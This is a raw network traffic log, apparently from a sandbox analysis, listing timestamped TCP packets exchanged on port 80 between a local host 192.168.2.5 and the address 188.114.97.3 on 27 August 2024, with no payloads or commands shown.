                              Aug 27, 2024 09:48:59.011163950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011173964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011183977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011200905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011293888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011308908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011320114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011331081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011337042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011342049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011358976 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011380911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011565924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011574984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011584997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011595964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011606932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011610985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011616945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011621952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011631012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011642933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011651993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011652946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011665106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011674881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011677980 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011684895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011696100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011696100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011723995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011750937 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011934996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011945009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011954069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011965036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011976004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011986017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011986017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011997938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012007952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012012005 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.012017965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012029886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012033939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.012039900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012051105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012054920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.012073994 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.012092113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.012214899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012226105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012234926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012244940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.012262106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.012290001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.052531958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052572966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052584887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052615881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.052634001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052644968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052673101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.052701950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052712917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.052750111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.095772982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095834017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095843077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095897913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.095901012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095910072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095920086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095932007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.095944881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.095963001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.096112967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096122980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096132994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096147060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096158028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096163988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.096168041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096179008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096187115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.096189976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096201897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096220016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.096240044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.096296072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096307039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096339941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096343040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.096421957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096431971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.096470118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098092079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098099947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098109007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098149061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098185062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098196030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098206997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098231077 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098272085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098282099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098320007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098344088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098354101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098362923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098387003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098417997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098468065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098483086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098491907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098501921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098512888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098514080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098537922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098553896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098577023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098606110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098615885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098624945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098654032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098663092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098676920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098691940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098704100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098726988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098792076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098905087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098916054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098925114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098934889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098942995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098946095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098958015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098968983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098974943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098978996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.098989010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.098997116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099004984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099013090 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099023104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099050045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099060059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099087954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099179983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099189043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099195004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099204063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099210024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099235058 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099261045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099322081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099332094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099340916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099351883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099365950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099389076 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099406958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099417925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099455118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099490881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099502087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099509954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099534035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099606991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099617004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099631071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099639893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099648952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099649906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099668026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099689007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099812031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099911928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099922895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099932909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.099958897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.099983931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100025892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100035906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100045919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100054979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100065947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100071907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100096941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100191116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100199938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100212097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100224972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100231886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100235939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100261927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100272894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100339890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100351095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100359917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100369930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100380898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100389004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100390911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100403070 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100421906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100492001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100507975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100517988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100528002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100538969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100548983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100557089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100584030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100650072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100660086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100749016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100769043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100779057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100788116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100800037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100810051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100815058 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100821972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100831032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100841999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100845098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.100860119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.100893974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.141195059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141226053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141239882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141251087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141263962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141284943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141297102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141309023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.141319990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.141349077 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.141377926 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.184700012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184726954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184737921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184837103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184847116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184856892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184866905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184884071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.184946060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.184946060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.184946060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.184987068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185002089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185012102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185019016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185023069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185046911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185048103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185070992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185129881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185142040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185151100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185161114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185183048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185216904 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185265064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185276031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185286045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185297012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185307026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.185312033 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185328960 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.185353041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.186666012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186719894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186731100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186767101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.186805964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186815977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186825991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186836004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186847925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.186877012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186880112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.186886072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.186913967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.186994076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187004089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187012911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187022924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187035084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187037945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187063932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187086105 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187134027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187143087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187180996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187195063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187206984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187216043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187227011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187254906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187275887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187294006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187304020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187350988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187367916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187376976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187386036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187417030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187444925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187453032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187462091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.187495947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.187514067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.273962975 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.278836012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.380245924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.381020069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.385880947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491158962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491180897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491193056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491199017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491204977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491216898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491226912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491307020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491326094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491338968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491348028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491362095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491363049 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491386890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491554022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491569996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491580009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491590977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491599083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491604090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491612911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491617918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491625071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491637945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491646051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:00.491650105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:49:00.491660118 CEST8061383188.114.97.3192.168.2.5
